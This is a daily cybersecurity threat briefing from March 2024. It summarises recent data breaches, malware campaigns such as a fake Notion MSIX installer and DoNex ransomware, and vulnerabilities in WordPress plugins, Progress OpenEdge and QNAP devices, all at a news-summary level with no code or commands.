Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Mar 11, 2024

Planning to hop to Notion? Watch out! Malicious MSIX installers have been discovered mimicking the Notion app. Caution is urged as similar tactics may target Slack, WinRar, and Bandicam. Amidst the vulnerability landscape in WordPress plugins, the Ultimate Member plugin faces a critical XSS flaw, posing a risk of unauthorized access. Concurrently, a fresh cyberattack campaign targets the Popup Builder plugin in a new cyberattack campaign that took off in the past few weeks.

Back to malware updates, a new ransomware variant has emerged to hit organizations in the U.S. and Europe. Dubbed DoNex, the actors behind it have listed five companies as their victims. Additionally, QNAP disclosed sensitive vulnerabilities in its systems, posing security risks.

Top Breaches Reported in the Last 24 Hours

Millions of customer records put on sale

Financial services firm Paysign is investigating reports of a data breach after hackers attempted to sell a database allegedly containing millions of customer records. A cybercriminal forum user named "emo" claimed to have stolen over 1.2 million records, including customer names, addresses, dates of birth, phone numbers, and account balances. The company emphasized its commitment to customer data security but provided no further details on the incident.

Leicester City Council paralyzed by attack

Leicester City Council's IT systems and phone lines were knocked offline due to a cyberattack. Emergency phone lines have been established for urgent assistance, while residents are directed to the council's website for information. Councillors express concern over the severity and duration of the outage, with plans to discuss the matter at the Audit and Risk Committee. The council has apologized for the inconvenience and assured efforts to minimize disruption to frontline services.

Top Malware Reported in the Last 24 Hours

MSIX malware disguised as Notion installer

A deceptive scheme has emerged wherein MSIX malware masquerades as the legitimate Notion installer and is distributed through a website resembling the official Notion homepage. Upon downloading, the file named 'Notion-x86.msix' appears to be signed with a valid certificate, further deceiving users. However, upon installation, malicious scripts are deployed, including StartingScriptWrapper.ps1 and refresh.ps1, the latter being the malware responsible for downloading commands from a C2 server.

Enterprises grapple with DoNex ransomware threat

Enterprises in the U.S. and Europe are facing heightened concerns due to the emergence of the DoNex ransomware strain. The group employs double-extortion tactics, encrypting files and exfiltrating sensitive data to increase pressure on victims. While the attackers’ exact infiltration methods remain undisclosed, cybersecurity teams are actively investigating to uncover DoNex's modus operandi. The group has already leaked data from at least five companies.

BianLian ransomware exploits TeamCity flaws

BianLian ransomware operators were observed leveraging security holes in JetBrains TeamCity software, deploying a PowerShell variant of their Go backdoor. GuidePoint Security's report outlines the attack chain, including initial access via CVE-2024-27198 or CVE-2023-42793, creating new users, and running malicious commands for post-exploitation and lateral movement. Operators implant custom Go-based backdoors tailored to victims and deploy remote desktop tools like AnyDesk.

Matanbuchus malware exploits XLS files

The Matanbuchus malware launched a fresh campaign targeting Windows systems through malicious XLS files. The malware's sophistication allows it to fetch JavaScript files and download malicious DLLs, initiating potential cascaded infections. Notably, the malware strain is used in association with Cobalt Strike beacons, enhancing threat actors' control over compromised systems.

Top Vulnerabilities Reported in the Last 24 Hours

WordPress plugin patched for XSS flaw

A stored XSS vulnerability (CVE-2024-2123) was discovered in the Ultimate Member WordPress plugin, affecting versions up to 2.8.3. Reported through the Wordfence Bug Bounty Program, the flaw could allow unauthenticated attackers to inject malicious scripts. Furthermore, unauthenticated attackers could potentially gain administrative user access on sites running the vulnerable plugin, even without privileges. Users are urged to update immediately to ensure protection.

Attackers continue to target Popup Builder

A cybercrime group was discovered exploiting outdated versions of the Popup Builder plugin for WordPress, noted Sucuri. So far, it has injected code into over 3,300 WordPress websites. The injected code, stored in the 'wp_postmeta' database table, manipulates Popup Builder plugin events to execute actions such as redirecting visitors to phishing or malware sites. Sucuri identified injection points in the WordPress admin interface's Custom JavaScript or Custom CSS sections.

Authentication bypass bug grips Progress Software

A critical security flaw (CVE-2024-1403) has been discovered in Progress Software OpenEdge Authentication Gateway and AdminServer. With a maximum CVSS severity rating of 10.0, the vulnerability affects OpenEdge versions 11.7.18 and earlier, 12.2.13 and earlier, and 12.8.0. Exploiting this flaw allows unauthorized access by bypassing authentication protections. Horizon3[.]ai has reverse-engineered the AdminServer service, providing a PoC exploit highlighting potential avenues for unauthorized access and potential RCE.

QNAP devices vulnerable to critical flaws

QNAP disclosed critical vulnerabilities, including CVE-2024-21899, CVE-2024-21900, and CVE-2024-21901, that allow unauthorized access, arbitrary command execution, and SQL injection attacks, respectively. Affected versions include QTS 5.1.x, QTS 4.5.x, QuTS hero h5.1.x, QuTS hero h4.5.x, QuTScloud c5.x, and myQNAPcloud 1.0.x. QNAP urged users to update their systems immediately to mitigate potential threats.

Related Threat Briefings